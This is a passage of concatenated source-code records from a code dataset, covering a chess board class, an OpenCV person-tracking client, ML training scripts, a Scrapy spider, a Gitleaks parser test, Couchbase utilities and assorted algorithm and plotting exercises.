\"&report=uilist&format=tex\"\n #print(\"Link:\", link)\n response = requests.get(link)\n #print(response)\n data = response.text\n lines = data.split(\"\")\n #print(data)\n #print(len(lines) - 1)\n cite_count_list.append(len(lines) - 1)\n pmid_list.append(pmid)\n nct_id_list.append(nctid)\n except:\n print(str(pmid), \" citations cannot be retrieved\")\n cite_count_list.append(-1)\n pmid_list.append(pmid)\n nct_id_list.append(nctid)\n continue\n time.sleep(2)\n\ntrial_one_to_one_data = trial_one_to_one_data.assign(citation_count= cite_count_list)\ntrial_one_to_one_data.to_csv('trial_mapped_onetoone_CitationCount_10thSept.csv', index=False)\n","sub_path":"ExtendedRetrieval_Miscellaneous/CitationCountGivenPubMedId_10thSept.py","file_name":"CitationCountGivenPubMedId_10thSept.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"261180511","text":"from pieces import *\nfrom utility import Coord\n\nclass Board():\n def __init__(self):\n # starting new game when init is called\n self.create_standard_board()\n\n self.white_dead = []\n self.black_dead = []\n\n def create_standard_board(self):\n self.width = 8\n self.height = 8\n self.board = [\n [\n Rook(Coord(0, 0), False),\n Horse(Coord(1, 0), False),\n Bishop(Coord(2, 0), False),\n Queen(Coord(3, 0), False),\n King(Coord(4, 0), False),\n Bishop(Coord(5, 0), False),\n Horse(Coord(6, 0), False),\n Rook(Coord(7, 0), False)\n ],\n [\n Pawn(Coord(0, 1), False),\n Pawn(Coord(1, 1), False),\n Pawn(Coord(2, 1), False),\n Pawn(Coord(3, 1), False),\n Pawn(Coord(4, 1), False),\n Pawn(Coord(5, 1), False),\n Pawn(Coord(6, 1), False),\n Pawn(Coord(7, 1), False)\n ],\n [None, None, None, None, None, None, None, None],\n [None, None, None, None, None, None, None, None],\n [None, None, None, None, None, None, None, None],\n [None, None, None, None, None, None, None, None],\n [\n Pawn(Coord(0, 6), True),\n Pawn(Coord(1, 6), True),\n Pawn(Coord(2, 6), True),\n Pawn(Coord(3, 6), True),\n Pawn(Coord(4, 6), True),\n Pawn(Coord(5, 6), True),\n Pawn(Coord(6, 6), True),\n Pawn(Coord(7, 6), True)\n ],\n [\n Rook(Coord(0, 7), True),\n Horse(Coord(1, 7), True),\n Bishop(Coord(2, 7), True),\n Queen(Coord(3, 7), True),\n King(Coord(4, 7), True),\n Bishop(Coord(5, 7), True),\n Horse(Coord(6, 7), True),\n Rook(Coord(7, 7), True)\n ]]\n\n def log(self):\n for row in self.board:\n log([p.to_JSON() if p is not None else \"None\" for p in row])\n\n # given a move, return if the move is valid. Will also check if the move\n # is a castle move.\n def validate_move(self, player, move):\n piece = self.board[move.f.y][move.f.x]\n\n # is there a piece there?\n if piece is None:\n return False\n\n # special case: check if the move is the king rook castling\n if isinstance(piece, King):\n piece.is_castle(self.board, move)\n\n # does the player and piece colour match up?\n if (piece.is_white and player == 2) or (not piece.is_white and player == 1):\n return False\n \n # get all possible moves of piece\n moves = piece.possible_moves(self.board)\n\n if move in moves: # valid move\n return True\n \n return False\n\n\n # Assume the move has been validated already\n def make_move(self, player, move):\n # if the move is the king rook castling, do it first\n if move.is_castle:\n if player == 1:\n h = self.height-1\n else:\n h = 0\n self.board[h][self.width-4] = None # set the old king to none\n self.board[h][self.width-1] = None # set the old rook to none\n new_king = King(Coord(self.width-2, h), player == 1) # create new king\n new_king.has_moved = True\n new_rook = Rook(Coord(self.width-3, h), player == 1) # create new rook\n new_rook.has_moved = True\n self.board[h][self.width-2] = King(Coord(self.width-2, h), player == 1)\n self.board[h][self.width-3] = Rook(Coord(self.width-3, h), player == 1)\n return\n\n # if a piece is being eaten, add to correct dead pile\n if self.board[move.t.y][move.t.x] is not None:\n if player == 1:\n self.black_dead.append(self.board[move.t.y][move.t.x])\n else:\n self.white_dead.append(self.board[move.t.y][move.t.x])\n\n # move the piece\n self.board[move.t.y][move.t.x] = self.board[move.f.y][move.f.x]\n self.board[move.f.y][move.f.x] = None\n\n # update the piece's new position\n self.board[move.t.y][move.t.x].update_pos(move.t)\n\n\n # if the piece is a pawn and it hit the other end, it becomes a Queen\n # TODO: Real rules say the player gets to choose the piece it becomes\n if isinstance(self.board[move.t.y][move.t.x], Pawn):\n if player == 1 and move.t.y == 0:\n self.board[move.t.y][move.t.x] = Queen(move.t, True)\n elif player == 2 and move.t.y == self.height - 1:\n self.board[move.t.y][move.t.x] = Queen(move.t, False)\n\n # TODO: Returns true if player one is in checkmate (loses)\n def player_one_in_checkmate(self):\n pass\n\n # TODO: Returns true if player two is in checkmate (loses)\n def player_two_in_checkmate(self):\n pass\n\n # TODO: Returns true if player one is in check (king under attack)\n def player_one_in_check(self):\n pass\n\n # TODO: Returns true if player two is in check (king under attack)\n def player_two_in_check(self):\n pass\n\n def game_over(self):\n for p in self.white_dead:\n if p.name == \"King\":\n return True\n for p in self.black_dead:\n if p.name == \"King\":\n return True\n return False\n\n def possible_moves_JSON(self, flip=False):\n json = []\n for row in self.board:\n t = []\n for piece in row:\n e = []\n if piece is not None:\n moves = piece.possible_moves(self.board)\n for m in moves:\n if flip:\n m.flip(self.height, self.width)\n e.append([m.t.x, m.t.y])\n t.append(e)\n json.append(t)\n if flip:\n json.reverse()\n\n return json\n\n def dead_pieces_JSON(self):\n json = {\n \"white\": [p.to_JSON() for p in self.white_dead],\n \"black\": [p.to_JSON() for p in self.black_dead]\n }\n\n return json\n\n\n def to_JSON(self, flip=False):\n json = [[p.to_JSON() if p is not None else [\"N\", False] for p in row] for row in self.board]\n if flip:\n json.reverse()\n\n return json\n","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":6330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"33005580","text":"# USAGE\n# python real_time_object_detection.py --prototxt MobileNetSSD_deploy.prototxt.txt --model MobileNetSSD_deploy.caffemodel\n\n# import the necessary packages\nfrom imutils.video import VideoStream\nfrom imutils.video import FPS\nimport numpy as np\nimport argparse\nimport imutils\nimport time\nimport cv2\nimport requests\nimport os\n\n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-p\", \"--prototxt\", required=True,\n help=\"path to Caffe 'deploy' prototxt file\")\nap.add_argument(\"-m\", \"--model\", required=True,\n help=\"path to Caffe pre-trained model\")\nap.add_argument(\"-c\", \"--confidence\", type=float, default=0.2,\n help=\"minimum probability to filter weak detections\")\nap.add_argument(\"-s\", \"--server\",default=\"http://raspberrypi.local:8000\",\n help=\"raspberry pi to connect to\")\nap.add_argument(\"-v\", \"--visual\",action='store_true',\n help=\"show video feed on screen\")\nargs = vars(ap.parse_args())\n\n# initialize the list of class labels MobileNet SSD was trained to\n# detect, then generate a set of bounding box colors for each class\nCLASSES = [\"background\", \"aeroplane\", \"bicycle\", \"bird\", \"boat\",\n \"bottle\", \"bus\", \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\",\n \"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\", \"sheep\",\n \"sofa\", \"train\", \"tvmonitor\"]\nCOLORS = np.random.uniform(0, 255, size=(len(CLASSES), 3))\n\n# load our serialized model from disk\nprint(\"[INFO] loading model...\")\nnet = cv2.dnn.readNetFromCaffe(args[\"prototxt\"], args[\"model\"])\n\n# initialize the video stream, allow the cammera sensor to warmup,\n# and initialize the FPS counter\nprint(\"[INFO] starting video stream...\")\nstream = os.path.join(args['server'],'stream.mjpg')\nvs = VideoStream(stream).start()\ntime.sleep(2.0)\nfps = FPS().start()\n\n# loop over the frames from the video stream\ndef find_people(detections):\n # loop over the detections\n for i in np.arange(0, detections.shape[2]):\n # extract the confidence (i.e., probability) associated with\n # the prediction\n confidence = detections[0, 0, i, 2]\n\n # filter out weak detections by ensuring the `confidence` is\n # greater than the minimum confidence\n if confidence > args[\"confidence\"]:\n # extract the index of the class label from the\n # `detections`, then compute the (x, y)-coordinates of\n # the bounding box for the object\n idx = int(detections[0, 0, i, 1])\n if CLASSES[idx] != 'person':\n continue\n box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n (startX, startY, endX, endY) = box.astype(\"int\")\n center = (endX + startX)//2, (endY + startY)//2\n\n if args['visual']:\n # draw the prediction on the frame\n label = \"{}: {:.2f}%\".format(CLASSES[idx],\n confidence * 100)\n cv2.rectangle(frame, (startX, startY), (endX, endY),\n COLORS[idx], 2)\n y = startY - 15 if startY - 15 > 15 else startY + 15\n cv2.putText(frame, label, (startX, y),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, COLORS[idx], 2)\n\n cv2.circle(frame,center, 10, COLORS[idx])\n height = abs(endY - startY)\n center = {'x': center[0]/w, 'y': center[1]/h}\n #requests.get(os.path.join(args['server'],\"pointat\"),params=center)\n yield {'height':height, 'center':center}\n\nmissing_count = 0\nwhile True:\n # grab the frame from the threaded video stream and resize it\n # to have a maximum width of 400 pixels\n frame = vs.read()\n frame = imutils.resize(frame, width=400)\n\n # grab the frame dimensions and convert it to a blob\n (h, w) = frame.shape[:2]\n blob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)),\n 0.007843, (300, 300), 127.5)\n\n # pass the blob through the network and obtain the detections and\n # predictions\n net.setInput(blob)\n detections = net.forward()\n try:\n person = max(find_people(detections),key=lambda p:p['height'])\n missing_count = 0\n requests.get(os.path.join(args['server'],\"pointat\"),\n params=person['center'])\n except ValueError:\n missing_count += 1\n if missing_count > 10:\n requests.get(os.path.join(args['server'],\"keeplooking\"))\n\n # show the output frame\n if args['visual']:\n cv2.imshow(\"Frame\", frame)\n key = cv2.waitKey(1) & 0xFF\n\n # if the `q` key was pressed, break from the loop\n if key == ord(\"q\"):\n break\n\n # update the FPS counter\n fps.update()\n\n# stop the timer and display FPS information\nfps.stop()\nprint(\"[INFO] elapsed time: {:.2f}\".format(fps.elapsed()))\nprint(\"[INFO] approx. FPS: {:.2f}\".format(fps.fps()))\n\n# do a bit of cleanup\ncv2.destroyAllWindows()\nvs.stop()\n","sub_path":"Klomi-Robot-master/client-server/real_time_object_detection.py","file_name":"real_time_object_detection.py","file_ext":"py","file_size_in_byte":4877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"394396489","text":"from django.test import TestCase\nfrom dojo.tools.gitleaks.parser import GitleaksJSONParser\nfrom dojo.models import Test\n\n\nclass TestGitleaksParser(TestCase):\n\n def test_parse_without_file_has_no_finding(self):\n parser = GitleaksJSONParser(None, Test())\n self.assertEqual(0, len(parser.items))\n\n def test_parse_file_with_one_finding(self):\n testfile = open(\"dojo/unittests/scans/gitleaks/data_one.json\")\n parser = GitleaksJSONParser(testfile, Test())\n self.assertEqual(1, len(parser.items))\n\n def test_parse_file_with_multiple_finding(self):\n testfile = open(\"dojo/unittests/scans/gitleaks/data_many.json\")\n parser = GitleaksJSONParser(testfile, Test())\n self.assertEqual(2, len(parser.items))\n","sub_path":"dojo/unittests/test_gitleaks_parser.py","file_name":"test_gitleaks_parser.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"353096596","text":"import numpy as np\nfrom pyuwds3.types.vector.vector6d import Vector6D\nfrom pyuwds3.types.vector.vector3d import Vector3D\n\n\nclass ObjectPoseEstimator(object):\n def estimate(self, objects, view_matrix, camera_matrix, dist_coeffs):\n \"\"\" \"\"\"\n for o in objects:\n if o.bbox.depth is not None:\n fx = camera_matrix[0][0]\n fy = camera_matrix[1][1]\n cx = camera_matrix[0][2]\n cy = camera_matrix[1][2]\n c = o.bbox.center()\n z = o.bbox.depth\n x = (c.x - cx) * z / fx\n y = (c.y - cy) * z / fy\n sensor_transform = Vector6D(x=x, y=y, z=z).transform()\n world_pose = Vector6D().from_transform(np.dot(view_matrix, sensor_transform))\n position = world_pose.position()\n rotation = Vector3D()\n o.update_pose(position, rotation)\n","sub_path":"src/uwds3_perception/estimation/object_pose_estimator.py","file_name":"object_pose_estimator.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"639964908","text":"import csv\nimport cv2\nimport numpy as np\nimport sklearn\n\nfrom keras.models import Sequential\nfrom keras.layers import Flatten, Dense, Lambda, Cropping2D, Dropout\nfrom keras.layers.convolutional import Convolution2D\n\nfrom sklearn.model_selection import train_test_split\n'''\n# Merge all .csv files together\nfile_result = open(\"driving_log_all.csv\",\"a\")\n# First .csv file:\nfor line in open(\"driving_log_0.csv\"):\n file_result.write(line)\n# All other .csv files (10 more, 11 files total): \nfor num in range(1,11):\n file = open(\"driving_log_\"+str(num)+\".csv\")\n for line in file:\n file_result.write(line)\n file.close()\nfile_result.close()\n'''\n# Load data from merged .csv file within working directory\nsamples = []\nwith open('driving_log_all.csv') as csv_file:\n reader = csv.reader(csv_file)\n for line in reader:\n if line[0] == 'center': # Exclude header\n continue\n samples.append(line)\n# Split data in train set (80%) and validation set (20%)\ntrain_samples, validation_samples = train_test_split(samples, test_size=0.2)\n'''\n# Change brightness of image for augmentation purpose\ndef gamma_correction(img, correction):\n img = img/255.0\n img = cv2.pow(img, correction)\n return np.uint8(img*255)\n'''\n# Define generator to load files in batches from directory 'IMG/' when needed, avoid MemoryError\ndef generator(samples, batch_size=64):\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates\n sklearn.utils.shuffle(samples)\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n\n images = []\n angles = []\n for batch_sample in batch_samples:\n if '\\\\' in batch_sample[0]:\n center_name = 'IMG/'+batch_sample[0].split('\\\\')[-1]\n left_name = 'IMG/'+batch_sample[1].split('\\\\')[-1]\n right_name = 'IMG/'+batch_sample[2].split('\\\\')[-1]\n else: \n center_name = 'IMG/'+batch_sample[0].split('/')[-1]\n left_name = 'IMG/'+batch_sample[1].split('/')[-1]\n right_name = 'IMG/'+batch_sample[2].split('/')[-1]\n left_image = cv2.imread(left_name)\n \n left_image = cv2.imread(left_name)\n left_angle = float(batch_sample[3]) + 0.2\n images.append(left_image)\n angles.append(left_angle)\n right_image = cv2.imread(right_name)\n right_angle = float(batch_sample[3]) - 0.2\n images.append(right_image)\n angles.append(right_angle)\n center_image = cv2.imread(center_name)\n center_angle = float(batch_sample[3])\n images.append(center_image)\n angles.append(center_angle)\n images.append(cv2.flip(center_image,1))\n angles.append(center_angle*-1.0) \n #value = np.random.uniform(0.2,1.5)\n #if value > 0.8 and value < 1.1:\n # value -= 0.4\n #img_bright = gamma_correction(center_image, value)\n #images.append(img_bright)\n #angles.append(center_angle)\n\n X_train = np.array(images)\n y_train = np.array(angles)\n yield sklearn.utils.shuffle(X_train, y_train)\n\n# compile and train the model using the generator function\ntrain_generator = generator(train_samples, batch_size=64)\nvalidation_generator = generator(validation_samples, batch_size=64)\n\n# Image format\nrow, col, ch = 160, 320, 3\n\nmodel = Sequential()\n# Preprocess incoming data, centered around zero with small standard deviation \nmodel.add(Lambda(lambda x: x/255.0 - 0.5, input_shape=(row, col, ch)))\nmodel.add(Cropping2D(cropping=((70,25), (0,0))))\nmodel.add(Convolution2D(24, 5, 5, subsample=(2,2), activation='relu'))\nmodel.add(Convolution2D(36, 5, 5, subsample=(2,2), activation='relu'))\nmodel.add(Convolution2D(48, 5, 5, subsample=(2,2), activation='relu'))\nmodel.add(Convolution2D(64, 3, 3, activation='relu'))\nmodel.add(Convolution2D(64, 3, 3, activation='relu'))\n#model.add(Dropout(0.5))\nmodel.add(Flatten())\nmodel.add(Dense(100))\n#model.add(Dense(250))\n#model.add(Dropout(0.5))\n#model.add(Dense(75))\nmodel.add(Dense(50))\nmodel.add(Dense(10))\nmodel.add(Dense(1))\n\nmodel.compile(loss='mse', optimizer='adam')\nmodel.fit_generator(train_generator, samples_per_epoch= len(train_samples)*4/64,\n validation_data=validation_generator,\n nb_val_samples=len(validation_samples)*4/64, nb_epoch=3)\n# Save model\n#model.save('model_gener.h5')","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"248940961","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.metrics import mean_squared_error as MSE\nfrom sklearn import linear_model\nfrom sklearn.linear_model import Lasso\nfrom sklearn.model_selection import cross_val_score\n\ndef predictive_error(holdout, num_covs, covs_subset, lasso_reg):\n\n\t# Change column names into panda index (object)\n col = list(range(num_covs))\n col.extend([\"outcome\",\"treated\"])\n col = pd.Index(col)\n holdout.columns = col\n\n # Ridge Regression Model\n lasso_c = Lasso(alpha=lasso_reg)\n lasso_t = Lasso(alpha=lasso_reg)\n\n holdout_treated = holdout[holdout['treated']==1][covs_subset]\n holdout_control = holdout[holdout['treated']==0][covs_subset]\n\n\n mse_t = np.mean(cross_val_score(lasso_t, holdout_treated,\n holdout[holdout['treated']==1]['outcome'] , scoring = 'neg_mean_squared_error' ) )\n\n\n mse_c = np.mean(cross_val_score(lasso_c, holdout_control,\n holdout[holdout['treated']==0]['outcome'] , scoring = 'neg_mean_squared_error' ) )\n\n\n return ((mse_t + mse_c))\n","sub_path":"inst/Lasso.py","file_name":"Lasso.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"49994290","text":"BLOCK_HEIGHT = 50\nBLOCK_WIDTH = 120\nBLOCK_STEP = 25\nTEXT_LENGTH = 15\n\nstart_x = 245\nstart_y = 100\n\n\ndef calc_x(x):\n return start_x + BLOCK_WIDTH * x\n\n\ndef calc_y(y):\n return start_y + BLOCK_HEIGHT * y + BLOCK_STEP * y\n\n\ndef redraw_chart(flowchart, canvas, func, dialog_factory):\n canvas.delete(\"all\")\n flowchart.recalculate_coords()\n draw_node(canvas, flowchart.start, func, dialog_factory)\n\n\ndef draw_node(canvas, node, func, dialog_factory):\n global start_x\n global start_y\n\n cur_x = calc_x(node.x)\n cur_y = calc_y(node.y)\n\n node_text = get_node_text(node)\n node.draw_func(canvas, cur_x, cur_y, BLOCK_WIDTH, BLOCK_HEIGHT, node_text[:TEXT_LENGTH] +\n (node_text[TEXT_LENGTH:] and '..'), node, func, dialog_factory)\n\n if node.back_link is not None:\n # Нарисовать стрелку к началу цикла\n l1 = canvas.create_line(cur_x + BLOCK_WIDTH // 2, cur_y, cur_x + BLOCK_WIDTH +\n BLOCK_STEP // 2, cur_y)\n l2 = canvas.create_line(cur_x + BLOCK_WIDTH + BLOCK_STEP // 2, cur_y,\n cur_x + BLOCK_WIDTH + BLOCK_STEP // 2, calc_y(node.back_link.y) + BLOCK_HEIGHT // 2)\n l3 = canvas.create_line(cur_x + BLOCK_WIDTH + BLOCK_STEP // 2, calc_y(node.back_link.y) + BLOCK_HEIGHT // 2,\n cur_x + BLOCK_WIDTH, calc_y(node.back_link.y) + BLOCK_HEIGHT // 2, arrow=\"last\")\n canvas.tag_lower(l1)\n canvas.tag_lower(l2)\n canvas.tag_lower(l3)\n\n if node.children[1] is not None:\n child = node.children[0]\n l1 = canvas.create_line(cur_x, cur_y + BLOCK_HEIGHT // 2, calc_x(child.x) + BLOCK_WIDTH // 2,\n cur_y + BLOCK_HEIGHT // 2)\n canvas.tag_lower(l1)\n l2 = canvas.create_line(calc_x(child.x) + BLOCK_WIDTH // 2, cur_y + BLOCK_HEIGHT // 2, calc_x(child.x) +\n BLOCK_WIDTH // 2, calc_y(child.y))\n canvas.tag_lower(l2)\n draw_node(canvas, child, func, dialog_factory)\n\n child = node.children[1]\n l1 = canvas.create_line(cur_x, cur_y + BLOCK_HEIGHT // 2, calc_x(child.x) + BLOCK_WIDTH // 2,\n cur_y + BLOCK_HEIGHT // 2)\n canvas.tag_lower(l1)\n l2 = canvas.create_line(calc_x(child.x) + BLOCK_WIDTH // 2, cur_y + BLOCK_HEIGHT // 2, calc_x(child.x) +\n BLOCK_WIDTH // 2, calc_y(child.y))\n canvas.tag_lower(l2)\n\n canvas.create_text([cur_x - BLOCK_WIDTH // 2, cur_y + BLOCK_STEP / 2.5], justify=\"center\", text=\"Да\")\n canvas.create_text([cur_x + BLOCK_WIDTH * 1.5, cur_y + BLOCK_STEP / 2.5], justify=\"center\", text=\"Нет\")\n draw_node(canvas, child, func, dialog_factory)\n elif node.children[0] is not None:\n child = node.children[0]\n arrow = \"\" if child.type in {\"loop_end\", \"if_end\"} else \"last\"\n if child.x == node.x:\n l = canvas.create_line(cur_x + BLOCK_WIDTH // 2, cur_y, calc_x(child.x) + BLOCK_WIDTH // 2,\n calc_y(child.y), arrow=arrow)\n canvas.tag_lower(l)\n else:\n l1 = canvas.create_line(cur_x + BLOCK_WIDTH // 2, cur_y, cur_x + BLOCK_WIDTH // 2,\n calc_y(child.y))\n canvas.tag_lower(l1)\n l2 = canvas.create_line(cur_x + BLOCK_WIDTH // 2, calc_y(child.y), calc_x(child.x) +\n BLOCK_WIDTH // 2, calc_y(child.y), arrow=arrow)\n canvas.tag_lower(l2)\n\n draw_node(canvas, child, func, dialog_factory)\n\n\ndef get_node_text(node):\n if node.type == \"if\":\n return node.text if node.value is None else \"Если {}, тогда\".format(node.value)\n elif node.type == \"while_loop\":\n return node.text if node.value is None else \"Пока {}, тогда\".format(node.value)\n elif node.type == \"for_loop\":\n return node.text if node.value is None else \"Для {} от {} до {}\".format(node.value[0],\n node.value[1],\n node.value[2])\n elif node.type == \"input\":\n return node.text if node.value is None else \"Ввод {}\".format(node.value)\n elif node.type == \"output\":\n return node.text if node.value is None else \"Вывод {}\".format(node.value)\n elif node.type == \"assign\":\n return node.text if node.value is None else node.value\n elif node.type == \"var\":\n return node.text if node.value is None else \"var \" + \",\".join([val for val in node.value.values() if val])\n elif node.type == \"call_function\":\n return \"Вызов функции \" + node.value[2]\n else:\n return node.text\n\n","sub_path":"drawer.py","file_name":"drawer.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"97501069","text":"\"\"\"\nGiven a string and a set of characters, return the shortest substring containing all the characters in the set.\n\nFor example, given the string \"figehaeci\" and the set of characters {a, e, i}, you should return \"aeci\".\n\nIf there is no substring containing all the characters in the set, return null.\n\nSolution:\nRunning window variation,\nUse a hashmap to keep counts\nUse a start index & end index to keep positions\nO(n) time & space\n\"\"\"\n\n\ndef find_shortest_substring(string, char_set):\n counts = dict()\n start = 0\n end = 0\n curr = None\n chars_found = set()\n\n while end < len(string) and start < len(string):\n while len(chars_found) < len(char_set) and end < len(string):\n end_char = string[end]\n if end_char not in counts:\n counts[end_char] = 0\n counts[end_char] += 1\n\n if end_char in char_set and counts[end_char] == 1:\n chars_found.add(end_char)\n\n if len(chars_found) == len(char_set):\n if not curr:\n curr = (start, end)\n if curr[1] - curr[0] > end - start:\n curr = (start, end)\n end += 1\n\n while len(chars_found) >= len(char_set) and start < len(string):\n # snip until window cannot fulfil char_set\n start_char = string[start]\n counts[start_char] -= 1\n if counts[start_char] == 0:\n counts.pop(start_char)\n if start_char in char_set:\n chars_found.remove(start_char)\n start += 1\n\n if curr:\n return string[curr[0] : curr[1] + 1]\n else:\n return None\n\n\n# while there's r\n# move r, increment matches\n# if matches is full and l <= r:\n# update result\n# delete l\n# update matches\n# increment l\n# increment r\n# return result\ndef shorter_solution(string, char_set):\n matches = 0\n start = 0\n end = 0\n counts = {}\n result = None\n\n while end < len(string):\n char = string[end]\n counts[char] = counts.get(char, 0) + 1\n if counts[char] == 1 and char in char_set:\n matches += 1\n\n while matches == len(char_set) and start <= end:\n if not result:\n result = (start, end)\n\n if end - start < result[1] - result[0]:\n result = (start, end)\n\n char = string[start]\n counts[char] -= 1\n if char in char_set and counts[char] == 0:\n matches -= 1\n\n start += 1\n\n end += 1\n if result:\n return string[result[0] : result[1] + 1]\n else:\n return None\n\n\nif __name__ == \"__main__\":\n\n in1 = (\"figehaeci\", {\"a\", \"e\", \"i\"})\n expected1 = \"aeci\"\n\n assert shorter_solution(in1[0], in1[1]) == expected1\n","sub_path":"old/dcp_series/dcp_103.py","file_name":"dcp_103.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"361343597","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom sun0769.items import Sun0769Item\n\nclass YgSpider(scrapy.Spider):\n name = 'yg'\n allowed_domains = ['sun0769.com']\n start_urls = ['http://wz.sun0769.com/html/top/reply.shtml']\n\n def parse(self, response):\n tr_list=response.xpath(\"//div[contains(@class,'clearfix')]/table[2]//tr\")\n for tr in tr_list:\n item=Sun0769Item()\n item['title']=tr.xpath('./td[3]/a/@title').get()\n item['page_info']=tr.xpath('./td[@class=\"txt18\"]/a/@href').get()\n item['date']=tr.xpath('./td[6]/text()').get()\n # print(item)\n yield scrapy.Request(url=item['page_info'],callback=self.page_parser,meta={'item':item})\n\n next_page=response.xpath(\"//a[text()='>']/@href\").get()\n if next_page:\n yield scrapy.Request(url=next_page,callback=self.parse)\n\n def page_parser(self,response):\n item=response.meta['item']\n item['content']=response.xpath(\"string(//td[@class='txt16_3'])\").get()\n item['img'] = response.xpath(\"//div[@class='textpic']//img/@src\").get()\n if item['img']:\n item['img']= 'http://wz.sun0769.com/'+item['img']\n yield item\n","sub_path":"scrapy 框架/sun0769/sun0769/spiders/yg.py","file_name":"yg.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"618523124","text":"import matplotlib.pyplot as plt\nfrom numpy import loadtxt\nfrom sklearn.decomposition import PCA\n\n# Load the dataset\nX = loadtxt('hw3_pen_data.txt', delimiter=',', usecols=range(0, 16))\nY = loadtxt('hw3_pen_data.txt', delimiter=',', usecols=16)\n\npca = PCA(n_components=2)\nX_r = pca.fit_transform(X)\n\n# Percentage of variance explained for each components\nprint('explained variance ratio (first two components): %s'\n % str(pca.explained_variance_ratio_))\n#\nplt.figure()\n\n# plt.scatter(X_r[:, 0], X_r[:, 1], 10, Y, label=Y)\nfor i in range(0, 10):\n plt.scatter(X_r[Y == i, 0], X_r[Y == i, 1], label=i, alpha=.8, lw=1)\nplt.legend(loc='best', shadow=False, scatterpoints=1)\nplt.title('PCA of MNIST Digit dataset')\n\nplt.show()\n","sub_path":"hw3/DimemsionReduction.py","file_name":"DimemsionReduction.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"513012865","text":"#可視化のまとめ練習\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nhouse = pd.read_csv(\"./house_data.csv\")\nprint(house)\n\n#横軸(日本円(1ドル100円)に変換した価格)縦軸(リビングの広さ)の散布図\nhouse[\"price_jp\"] = house[\"price\"]*100 #日本円に変換\nplt.scatter(x=house[\"price_jp\"],y=house[\"sqft_living\"],s=1,color=\"green\") #sは点のサイズ\nplt.xlabel(\"price\")\nplt.ylabel(\"sqft_living\")\nplt.show()\n\n#家の状態に新しいデータ列を追加。conditionが1~2はbad。3~5はgood。\nhouse[\"good/bad\"] = 0 #good/bad列を作成\nhouse.loc[house[\"condition\"]<=2,\"good/bad\"] = \"bad\" #good/bad列のhouse[condition]が2以下のものを取り出しbadを代入\nhouse.loc[house[\"condition\"]>=3,\"good/bad\"] = \"good\" #good/bad列のhouse[condition]が3以上のものを取り出しgoodを代入\nprint(\"condition列の要素数を確認\")\nprint(house[\"condition\"].value_counts()) #condition列の要素数を確認\nprint(\"good/bad列の要素数を確認\")\nprint(house[\"good/bad\"].value_counts()) #good/bad列の要素数を確認\n\n#箱ひげ図を作成 横軸(4と5だけの家のグレード) 縦軸(日本円に変換した価格) good/badで色相を分ける\ndata = house[(house[\"grade\"]>3) & (house[\"grade\"]<6)] #条件一致する物だけを抽出\nx = data[\"grade\"] #grade列を抽出\ny = data[\"price_jp\"] #price_jp列を抽出\nsns.boxplot(x,y,hue=house[\"good/bad\"])\nplt.show()\n","sub_path":"sample20.py","file_name":"sample20.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"27077685","text":"from couchbase.bucket import Bucket\nfrom couchbase.n1ql import N1QLQuery, N1QLRequest\n\nfrom app.core.config import COUCHBASE_BUCKET_NAME\n\nfrom typing import Sequence, Union\nfrom enum import Enum\n\n\ndef ensure_enums_to_strs(items: Sequence[Union[Enum, str]]):\n str_items = []\n for item in items:\n if isinstance(item, Enum):\n str_items.append(str(item.value))\n else:\n str_items.append(str(item))\n return str_items\n\n\ndef get_all_documents_by_type(bucket: Bucket, *, doc_type: str, skip=0, limit=100):\n query_str = f\"SELECT *, META().id as id FROM {COUCHBASE_BUCKET_NAME} WHERE type = $type LIMIT $limit OFFSET $skip;\"\n doc_type = \"userprofile\"\n q = N1QLQuery(\n query_str, bucket=COUCHBASE_BUCKET_NAME, type=doc_type, limit=limit, skip=skip\n )\n result = bucket.n1ql_query(q) # type: N1QLRequest\n return result\n","sub_path":"{{cookiecutter.project_slug}}/backend/app/app/crud/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"638632623","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\n\"\"\"\nPROBLEM\n\nYou have a callable that you would like to use with some other Python code,\npossibly as a callback function or handler, but it takes too many arguments and\ncauses an exception when 